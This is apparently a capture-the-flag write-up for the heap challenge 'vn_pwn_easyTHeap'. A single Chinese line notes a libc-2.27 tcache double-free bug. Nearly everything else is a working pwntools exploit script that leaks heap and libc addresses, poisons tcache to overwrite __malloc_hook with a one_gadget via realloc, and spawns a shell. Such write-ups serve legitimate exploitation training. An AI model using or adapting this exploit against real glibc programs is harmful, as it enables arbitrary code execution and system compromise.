ubuntu18.04 libc-2.27有Tcache机制,这道题malloc的指针数组在free的时没有置空…
exp
from pwn import *
context.log_level = 'debug'
def pause_debug():
log.info(proc.pidof(p))
pause()
def add(size):
p.sendlineafter('choice:', str(1))
p.sendlineafter('size?', str(size))
def edit(idx, content):
p.sendlineafter('choice:', str(2))
p.sendlineafter('idx?', str(idx))
p.sendafter('content:', content)
def show(idx):
p.sendlineafter('choice:', str(3))
p.sendlineafter('idx?', str(idx))
def delete(idx):
p.sendlineafter('choice:', str(4))
p.sendlineafter('idx?', str(idx))
proc_name = './vn_pwn_easyTHeap'
p = process(proc_name)
# p = remote('node3.buuoj.cn', 26415)
elf = ELF(proc_name)
libc = ELF('./libc-2.27.so')
add(0x100) # 0
add(0x18) # 1
delete(0)
delete(0)
show(0)
heap_addr = u64(p.recv(6).ljust(0x8, b'\x00')) - 0x250
add(0x100) # 2 0
edit(2, p64(heap_addr))
add(0x100) # 3 0
add(0x100) # 4 heap_addr
edit(4, b'\x07'.rjust(0x10, b'\x00'))
delete(0) # unsorted bin
show(0)
libc_base = u64(p.recv(6).ljust(0x8, b'\x00')) - 4111520
malloc_hook = libc_base + libc.sym['__malloc_hook']
realloc = libc_base + libc.sym['realloc']
one_gadget = libc_base + 0x4f322
edit(4, b'\x01'.rjust(0x10, b'\x00') + p64(0) * 21 + p64(malloc_hook - 8)) # heap_addr
add(0x100) # 5 fake_chunk
edit(5, p64(one_gadget) + p64(realloc + 8))
add(0x100)
p.interactive()
